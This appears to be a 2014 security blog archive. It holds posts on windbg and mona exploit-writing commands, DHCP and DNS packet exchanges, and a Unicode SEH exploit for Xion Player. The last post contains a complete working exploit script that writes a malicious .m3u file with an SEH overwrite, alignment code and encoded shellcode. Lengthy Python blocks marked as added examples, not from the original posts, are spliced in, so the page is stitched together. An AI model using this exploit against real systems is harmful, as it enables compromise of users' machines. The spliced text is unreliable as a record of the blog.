Wednesday, December 31, 2014

Useful windbg and mona commands for exploit writing



Find opcodes of instructions, say, "jmp esp"
0:000>a //press Enter key once
Input>jmp esp //press Enter key once
7c901214 jmp esp
0:000> u 7c901214 
ntdll!DbgUserBreakPoint+0x2:
7c901214 ffe4            jmp     esp

So "ff e4" is the opcode sequence for "jmp esp".

Opcode       Instruction
b0 01        mov al,1
c3           ret
0:000> s -b 0x00000000 L?0xffffffff "b001c3"
Syntax error at '"b001c3"'
0:000> s -b 0x00000000 L?0xffffffff b0 01 c3
77eda3fa  b0 01 c3 90 90 90 90 90-8b 41 14 66 8b 08 f6 c1
7c80c190  b0 01 c3 90 90 90 90 90-8b ff 55 8b ec 8b 45 0c
0:000> u 77eda3fa  
RPCRT4!NDR_PIPE_HELPER32::GotoNextParam+0x1b:
77eda3fa b001            mov     al,1

Opcode       Instruction
b0 01        mov al,1
c2 nn nn     ret n
0:000> s -b 0x00000000 L?0xffffffff b0 01 c2
71a517a1  b0 01 c2 0c 00 90 90 90-90 90 ff 25 18 70 a8 71  ...........%.p.q
77eda6b2  b0 01 c2 08 00 90 90 90-90 90 32 c0 c3 90 90 90  ..........2.....
7c9518ea  b0 01 c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56  ............U..V
0:000> u 71a517a1  
mswsock+0x17a1:
71a517a1 b001            mov     al,1
71a517a3 c20c00          ret     0Ch

push esp / pop ebp / ret
0:000> s -b 0x00000000 L?0xffffffff 54 5D c2
77eedc68  54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56  T]..........U..V
77eee353  54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56  T]..........U..V
77eee7b3  54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 51  T]..........U..Q
77eeecd6  54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 6a  T]..........U..j
77eeee84  54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56  T]..........U..V
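The searches above all do the same thing: scan memory for a byte sequence and print each hit as an address, sixteen bytes and an ASCII column. The Python below is an added example (not from the original post and not a windbg or mona feature) that reproduces that behaviour over a constructed memory image: a `??` wildcard stands for any byte, which is how the `c2 nn nn` form of `ret n` has to be searched, and a small decoder tells `ret` from `ret n` so the stack adjustment is visible. The base address and the bytes are made up for the demonstration.

```python
import re

# Constructed memory image for the demonstration (not a dump from a real module).
# A 'mov al,1 / ret' sits at BASE+0x10 and a 'mov al,1 / ret 0Ch' at BASE+0x40,
# each padded with nops the way the windbg hits on the page look.
BASE = 0x71A51700
MEMORY = (bytes(0x10)
          + bytes.fromhex("b0 01 c3 90 90 90 90 90 ff 25 18 70 88 71 00 00")
          + bytes(0x20)
          + bytes.fromhex("b0 01 c2 0c 00 90 90 90 90 90 ff 25 18 70 88 71")
          + bytes(0x10))


def search(memory, base, pattern):
    """Byte search like windbg 's -b <base> L<len> xx yy ..', extended with '??'
    as a single-byte wildcard. Returns the address of every hit."""
    regex = b"".join(b"." if tok == "??" else re.escape(bytes([int(tok, 16)]))
                     for tok in pattern.split())
    return [base + m.start() for m in re.finditer(regex, memory, re.DOTALL)]


def decode_ret(memory, base, addr):
    """Tell 'ret' (c3) from 'ret n' (c2 imm16): returns ('ret', bytes popped)."""
    off = addr - base
    if memory[off] == 0xC3:
        return ("ret", 0)
    if memory[off] == 0xC2:
        return ("ret", int.from_bytes(memory[off + 1:off + 3], "little"))
    return None


def hexdump_line(addr, data):
    """Format a hit the way 's -b' prints it: address, 16 bytes with a '-'
    after the eighth, then the ASCII column."""
    chunk = data[:16]
    left = " ".join("%02x" % b for b in chunk[:8])
    right = " ".join("%02x" % b for b in chunk[8:])
    text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
    return "%08x  %s-%s  %s" % (addr, left, right, text)


if __name__ == "__main__":
    for pat in ("b0 01 c3", "b0 01 c2 ?? ??"):
        for hit in search(MEMORY, BASE, pat):
            # the ret follows the two-byte 'mov al,1', hence hit + 2
            print(hexdump_line(hit, MEMORY[hit - BASE:]), decode_ret(MEMORY, BASE, hit + 2))
```

The point of the wildcard is the one the page makes with its two searches: `b0 01 c3` finds only the plain `ret`, while `ret n` carries a 16-bit immediate after `c2`, so it needs two wildcard bytes and the decoder reports how many bytes the return pops (0Ch = 12 in the constructed hit).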

Assorted mona commands that may be useful during exploit writing
!mona suggest
!mona assemble -s "mov eax#ret"

Find all executable locations that have a pointer to "jmp ecx"
!mona find -type instr -s "jmp ecx" -p2p -x X

Search for a push of any register, later followed by pop eax, directly followed by inc eax, with the chain ending in a retn
!mona findwild -s "push r32#*#pop eax#inc eax#*#retn"

!mona findwild -s "mov r16#*#retn"

ROP gadgets from all loaded DLLs
!mona rop -n -o

ROP gadgets from a specific DLL
!mona rop -m msvcr71.dll -n

ROP gadgets without bad characters
!mona rop -m msvcr71.dll -n -cpb '\x00\x0a\x0d'

Find stack pivots that move the stack pointer by 1500 bytes
!mona stackpivot -n -o -distance 1500

https://labs.snort.org/awbo/windbg.txt
http://windbg.info/doc/1-common-cmds.html
http://blog.disects.com/2014/04/windbg-useful-debugging-commands.html


Thursday, December 25, 2014

DHCP: No IP, to IP!

DHCP (Dynamic Host Configuration Protocol) is used to assign an IP address to a machine that connects to a network. DHCP runs over UDP on ports 67 and 68.

In this post we will see how a machine obtains an IP address.

Figure DHCP Client Communication Sequence

    Source     Dest        Source     Dest              Packet
   MAC addr   MAC addr    IP addr    IP addr           Description
   -----------------------------------------------------------------
   Client     Broadcast   0.0.0.0    255.255.255.255   DHCP Discover
   DHCPsrvr   Broadcast   DHCPsrvr   255.255.255.255   DHCP Offer
   Client     Broadcast   0.0.0.0    255.255.255.255   DHCP Request
   DHCPsrvr   Broadcast   DHCPsrvr   255.255.255.255   DHCP ACK
Source (Microsoft)
Broadcast MAC Address is ff:ff:ff:ff:ff:ff

The four packets below (packets 2 to 5 in the capture) do the work of obtaining an IP address. Let's get into the packet-level details of the exchange.

A machine connected to the network sends a broadcast packet with 255.255.255.255 as the destination address; this is an IP address lease request, and the DHCP server answers it with a DHCP Offer message. A DHCP client might also include its previous IP address in the Discover packet.
Figure DHCP Discover

The DHCP server takes an unassigned IP address from its address pool and makes a lease offer to the client.

Figure DHCP Offer

Figure DHCP Request

Figure DHCP ACK

In the above communication, the main thing to observe is the source and destination MAC addresses used.

Point to remember: bootp is the Wireshark filter, not dhcp. (Wireshark 3.0 and later also accept dhcp, since the dissector was renamed.)
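To make the four-message sequence in the figure concrete, the Python below is an added example (not from the original post) that assembles and parses the DHCP messages themselves and lays the exchange out in the same columns as the Microsoft figure: source and destination MAC, source and destination IP, and the message type read back from option 53. The MAC addresses and the 192.0.2.0/24 addresses are constructed for the demonstration; the transaction id and the broadcast flag are the usual values but are not taken from a real capture.

```python
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"
BOOTREQUEST, BOOTREPLY = 1, 2
BROADCAST_MAC, BROADCAST_IP = "ff:ff:ff:ff:ff:ff", "255.255.255.255"
MSG_TYPE = {1: "DHCP Discover", 2: "DHCP Offer", 3: "DHCP Request", 5: "DHCP ACK"}


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_dhcp(op, msg_type, client_mac, xid, yiaddr="0.0.0.0", options=()):
    """Assemble a BOOTP/DHCP message: 236-byte fixed header, magic cookie,
    option 53 (message type), any (code, value) options, then the 0xff end."""
    fixed = struct.pack("!BBBBIHH", op, 1, 6, 0, xid, 0, 0x8000)  # htype=1 ethernet, hlen=6, broadcast flag
    fixed += ip_bytes("0.0.0.0") + ip_bytes(yiaddr) + ip_bytes("0.0.0.0") * 2  # ciaddr, yiaddr, siaddr, giaddr
    fixed += mac_bytes(client_mac).ljust(16, b"\x00")  # chaddr, padded to 16 bytes
    fixed += bytes(64) + bytes(128)  # sname and file, unused here
    opts = bytes([53, 1, msg_type])
    for code, value in options:
        opts += bytes([code, len(value)]) + value
    return fixed + MAGIC_COOKIE + opts + b"\xff"


def parse_dhcp(msg):
    """Pull out the fields a capture shows: op, xid, client MAC, offered
    address, message type, and the requested address (option 50) if present."""
    op, _htype, hlen, _hops, xid, _secs, _flags = struct.unpack("!BBBBIHH", msg[:12])
    if msg[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message: magic cookie missing")
    options, off = {}, 240
    while off < len(msg) and msg[off] != 0xFF:
        if msg[off] == 0:  # pad option has no length byte
            off += 1
            continue
        code, length = msg[off], msg[off + 1]
        options[code] = msg[off + 2:off + 2 + length]
        off += 2 + length
    return {"op": op, "xid": xid,
            "chaddr": ":".join("%02x" % b for b in msg[28:28 + hlen]),
            "yiaddr": ip_str(msg[16:20]),
            "type": MSG_TYPE.get(options.get(53, b"\x00")[0], "unknown"),
            "requested_ip": ip_str(options[50]) if 50 in options else None}


def lease_exchange(client_mac, server_mac, server_ip, offered_ip, previous_ip=None, xid=0x3903F326):
    """The four-message sequence from the figure. Each row is
    (source MAC, destination MAC, source IP, destination IP, DHCP payload)."""
    discover_opts = [(50, ip_bytes(previous_ip))] if previous_ip else []
    server_id = [(54, ip_bytes(server_ip))]
    discover = build_dhcp(BOOTREQUEST, 1, client_mac, xid, options=discover_opts)
    offer = build_dhcp(BOOTREPLY, 2, client_mac, xid, yiaddr=offered_ip, options=server_id)
    request = build_dhcp(BOOTREQUEST, 3, client_mac, xid, options=[(50, ip_bytes(offered_ip))] + server_id)
    ack = build_dhcp(BOOTREPLY, 5, client_mac, xid, yiaddr=offered_ip, options=server_id)
    return [(client_mac, BROADCAST_MAC, "0.0.0.0", BROADCAST_IP, discover),
            (server_mac, BROADCAST_MAC, server_ip, BROADCAST_IP, offer),
            (client_mac, BROADCAST_MAC, "0.0.0.0", BROADCAST_IP, request),
            (server_mac, BROADCAST_MAC, server_ip, BROADCAST_IP, ack)]


def summarize(rows):
    """Reduce each row to the figure's columns, with the type read from the payload."""
    return [(s_mac, d_mac, s_ip, d_ip, parse_dhcp(payload)["type"])
            for s_mac, d_mac, s_ip, d_ip, payload in rows]


if __name__ == "__main__":
    # Constructed addresses for the demonstration.
    rows = lease_exchange("00:11:22:33:44:55", "00:11:22:aa:bb:cc", "192.0.2.1", "192.0.2.100", "192.0.2.50")
    for row in summarize(rows):
        print("%-18s %-18s %-10s %-16s %s" % row)
```

Note that the client sends both Discover and Request from 0.0.0.0 to the broadcast address, and the server replies to the broadcast MAC as well, which is why the figure's MAC columns are the ones worth watching: the only field that ties the four messages to one client is the chaddr inside the DHCP payload, together with the transaction id.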

http://support.microsoft.com/KB/169289


Thursday, December 18, 2014

DNS CNAME Record Query/Response

Figure DNS CNAME Query
Figure DNS CNAME Response

DNS A Record Query/Response

Figure A Record Query for www.google.co.in
Figure A Record Response for www.google.co.in
Figure A Record Query for domain www.google.com
Figure A Record Response for domain www.google.com
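The figures above are capture screenshots that are not reproduced here. As an added example (not from the original post), the Python below builds an A query, builds the kind of response the CNAME figure shows (a CNAME answer followed by the A record it resolves to) and parses it back, including the name compression pointers (`c0 0c`) that resolvers use for the owner name. The parser only follows pointers backwards, which is the check that stops a malformed response from sending it into a loop. The exchange uses the www.example.com name and a 192.0.2.0/24 address, both constructed for the demonstration rather than taken from the captures.

```python
import struct

RTYPE = {1: "A", 5: "CNAME"}


def encode_name(name):
    """'www.example.com' -> b'\\x03www\\x07example\\x03com\\x00'"""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg, off, depth=0):
    """Read a (possibly compressed) name at off; returns (name, offset after it).
    Pointers are only followed backwards, which rules out pointer loops."""
    if depth > 5:
        raise ValueError("compression pointer chain too long")
    labels = []
    while True:
        length = msg[off]
        if (length & 0xC0) == 0xC0:  # 11xxxxxx: pointer to an earlier name
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if ptr >= off:
                raise ValueError("forward or self-referencing compression pointer")
            suffix, _ = decode_name(msg, ptr, depth + 1)
            labels.append(suffix)
            return ".".join(labels), off + 2
        off += 1
        if length == 0:
            return ".".join(labels), off
        labels.append(msg[off:off + length].decode("ascii"))
        off += length


def build_query(name, rtype, txid=0x1234):
    """Standard query: RD set, one question, class IN."""
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", rtype, 1)


def build_response(query, answers):
    """answers: list of (owner, rtype, ttl, rdata), rdata being a dotted IPv4 for
    A or a name for CNAME. An owner equal to the question name is written as the
    pointer c0 0c, which is what real resolvers emit."""
    txid = struct.unpack("!H", query[:2])[0]
    qname, off = decode_name(query, 12)
    question = query[12:off + 4]
    body = struct.pack("!HHHHHH", txid, 0x8180, 1, len(answers), 0, 0) + question
    for owner, rtype, ttl, rdata in answers:
        rd = bytes(int(x) for x in rdata.split(".")) if rtype == 1 else encode_name(rdata)
        body += b"\xc0\x0c" if owner == qname else encode_name(owner)
        body += struct.pack("!HHIH", rtype, 1, ttl, len(rd)) + rd
    return body


def parse_answers(msg):
    """Return [(owner, type, value)] for every record in the answer section."""
    _txid, _flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):  # skip the question section
        _, off = decode_name(msg, off)
        off += 4
    records = []
    for _ in range(an):
        owner, off = decode_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            value = ".".join(str(b) for b in msg[off:off + 4])
        elif rtype == 5:
            value, _ = decode_name(msg, off)  # CNAME target may itself be compressed
        else:
            value = msg[off:off + rdlen].hex()
        records.append((owner, RTYPE.get(rtype, str(rtype)), value))
        off += rdlen
    return records


if __name__ == "__main__":
    # Constructed exchange: the name resolves via a CNAME to a documentation-range address.
    q = build_query("www.example.com", 1)
    r = build_response(q, [("www.example.com", 5, 300, "example.com"), ("example.com", 1, 300, "192.0.2.1")])
    print(parse_answers(r))
```

This is the shape of the CNAME figure: an A query for one name comes back with two answers, the CNAME that renames it and the A record for the canonical name, and a parser has to walk both through the compression pointers to recover the address.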


Friday, December 12, 2014

Xion Player Unicode Exploit

Unicode Exploitation Techniques


The instructions below transfer execution to the shellcode (eax points at it, so push eax followed by ret lands there):
0012F2D0 50 PUSH EAX
0012F2D1 006D 00 ADD BYTE PTR SS:[EBP],CH
0012F2D4 C3 RETN
#!c:\python27\python.exe
import struct

total_buf_size=5000
# 228 offset
buf1 = "A" * 228
#nseh = "MM"
nseh = "\x61\x62"
# seh = "NN"
seh = "\x15\x45"
print "seh: ", len(seh)

prep_stack = "D"
prep_stack = prep_stack + "\x6e" #nop/align
prep_stack = prep_stack + "\x55" #push ebp
prep_stack = prep_stack + "\x6e" #nop/align
prep_stack = prep_stack + "\x58" #pop eax => ebp into eax
prep_stack = prep_stack + "\x6e" #nop/align
prep_stack = prep_stack + "\x05\x14\x11" #add eax,11001400
prep_stack = prep_stack + "\x6e" #nop/align
prep_stack = prep_stack + "\x2d\x13\x11" #sub eax,11001300
prep_stack = prep_stack + "\x6e" #nop/align
print "prep_stack len=", len(prep_stack)

prep_jump = "\x50"  #push eax
prep_jump = prep_jump + "\x6d"  #nop/align
prep_jump = prep_jump + "\xc3"  #ret
print "prep_jump len=", len(prep_jump)


# offset between the last instruction 0012f3ac and
# our venetian jumpcode (c3 = ret) 0012f2d4
# to make sure shellcode is at eax
loca = "D"*107

shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERCQQ2LRCM0LJA"

remaining_buf = "D" * (total_buf_size -(len(buf1) + len(nseh)+len(seh)+len(prep_stack)+len(prep_jump) + len(loca) + len(shellcode)))
payload = buf1 + nseh + seh + prep_stack + prep_jump + loca + shellcode + remaining_buf
print "Payload length ", len(payload)

try:
  fh = open("xion_uni_m3u.m3u", "w")
  fh.write(payload)
  fh.close()
except IOError:
  print "Unable to create m3u file!\n"

To generate a cyclic pattern
!mona pc 1500

To find the offset within the cyclic pattern at the time of the crash
!mona findmsp
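The two commands above are the usual way to turn a crash into an offset: a pattern in which every position is unique is fed to the program, and the bytes that end up in a register or in the SEH record are looked up in it. The Python below is an added example (not from the original post, and not mona's own code) of the same construction, with the lookup also trying the UTF-16LE reading a Unicode conversion produces, which is what makes the 228-byte offset in this post findable even though the input is expanded with null bytes. The register values in the usage lines are constructed for the demonstration.

```python
import string
import struct


def cyclic_pattern(length):
    """Same construction as '!mona pc' / pattern_create.rb: Aa0Aa1...Aa9Ab0...
    Every 3-byte triplet is unique, so any 4 bytes taken from the pattern
    identify one position (20280 bytes before it repeats)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern, value):
    """What '!mona findmsp' does for one register. value is the 32-bit register
    content (an int, as the debugger shows it) or its 4 raw bytes. The
    little-endian bytes are tried first, then their reverse, then the UTF-16LE
    reading that a Unicode conversion of the input produces (0x00610041 -> 'Aa').
    Returns (offset, matched text) or None."""
    raw = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    candidates = [raw.decode("latin-1"), raw[::-1].decode("latin-1")]
    if raw[1] == 0 and raw[3] == 0:  # looks like two UTF-16LE characters
        candidates.append(raw.decode("utf-16-le"))
    for text in candidates:
        idx = pattern.find(text)
        if idx != -1:
            return idx, text
    return None


if __name__ == "__main__":
    pat = cyclic_pattern(1500)
    print(pat[:30])
    print(pattern_offset(pat, 0x41326141))            # a register holding 'Aa2A'
    print(pattern_offset(pat, b"\x41\x00\x61\x00"))   # the same data after Unicode expansion
```

A register value that does not occur in the pattern (0x41414141, for instance) returns None rather than a wrong offset, which is the case worth checking before trusting an offset from a crash.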

To search for pop/pop/ret addresses that survive the Unicode conversion
!mona seh -cp unicode
seh.txt will be created under C:\Program Files\Immunity Inc\Immunity Debugger. The addresses of interest are listed below; search for the string "unicode" in seh.txt.
0x00450015 : pop ebx # pop ebp # ret  |startnull,unicode,# asciiprint,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 # (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004800f5 : pop ebx # pop ebp # ret  | startnull,unicode # {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00410079 : pop edi # pop esi # ret 0x04 | startnull,unicode,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004400c0 : pop edi # pop esi # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00470166 : pop edi # pop ebp # ret  | startnull,unicode possible ansi transform(s) : 0047009A->00470161,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)

This article is based entirely on Peter Van Eeckhoutte's Unicode exploitation tutorial.

References
https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
http://www.fuzzysecurity.com/tutorials/expDev/5.html